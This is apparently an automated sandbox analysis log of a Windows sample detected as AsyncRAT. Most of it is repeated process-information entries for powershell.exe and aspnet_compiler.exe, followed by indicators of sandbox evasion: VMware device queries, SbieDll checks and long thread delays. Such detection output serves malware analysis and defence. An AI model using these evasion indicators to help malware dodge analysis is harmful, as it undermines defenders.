          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AsyncRATShow sources
          Source: Yara matchFile source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara matchFile source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: aspnet_compiler.exe, 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: C:\Windows\System32\mshta.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2688Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6527Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6447Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1046Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 6909Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 2765Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 406Jump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exe TID: 5568Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5488Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4356Thread sleep count: 6447 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4348Thread sleep count: 1046 > 30Jump to behavior
